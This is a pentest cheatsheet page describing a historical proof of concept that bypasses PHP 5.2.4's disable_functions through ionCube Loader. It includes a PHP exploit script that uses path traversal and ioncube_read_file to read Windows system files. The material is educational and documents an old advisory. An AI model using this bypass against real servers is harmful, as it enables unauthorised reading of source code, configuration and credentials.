daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

disable-functions-php-5-2-4-ioncube-extension-exploit.md (2606B)


      1 ---
      2 title: "PHP 5.2.4 ionCube Extension File-Read Bypass"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # PHP 5.2.4 ionCube Extension File-Read Bypass
     14 
     15 This historical proof of concept, credited to shinnai, targeted PHP 5.2.4 with ionCube Loader 6.5 on Windows. Even when `readfile` and `ioncube_read_file` were listed in `disable_functions`, the extension's file-reading function could be used to retrieve files outside the intended restriction. The original report was tested with `ioncube_loader_win_5.2.dll`; do not generalize the result to other PHP or ionCube versions without verification.<sup>[[1]](#references)[[2]](#references)</sup>
     16 
     17 The impact is an arbitrary file read in the PHP process context, which can expose PHP source, configuration files, or stored credentials. The original advisory also highlighted the extension's `ioncube_write_file` function as an additional surface, although this proof of concept demonstrates only the read primitive.<sup>[[1]](#references)</sup>
     18 
     19 ```php
     20 <?php
     21 /*
     22  * PHP 5.2.4 / ionCube Loader 6.5 historical proof of concept.
     23  * Original author: shinnai
     24  * Original environment: Windows XP Professional SP2, CLI and Apache.
     25  * php.ini:
     26  *   safe_mode = On
     27  *   disable_functions = ioncube_read_file, readfile
     28  */
     29 
     30 if (!extension_loaded('ionCube Loader')) {
     31     die('ionCube Loader extension required!');
     32 }
     33 
     34 $path = str_repeat('..\\', 20);
     35 
     36 // Baseline call expected to be blocked by disable_functions.
     37 $readfileOutput = readfile($path . 'windows\\system.ini');
     38 
     39 // Historical bypass through the extension function.
     40 $ioncubeOutput = ioncube_read_file($path . 'boot.ini');
     41 
     42 echo $readfileOutput;
     43 echo '<br><br>ionCube output:<br><br>';
     44 echo $ioncubeOutput;
     45 ?>
     46 ```
     47 
     48 ## References
     49 
     50 - [1] [Exploit-DB 4517 - PHP 5.2.4 ionCube `ioncube_read_file` safe-mode/`disable_functions` bypass](https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/local/4517.php)
     51 - [2] [shinnai's historical security-research site](http://shinnai.altervista.org/)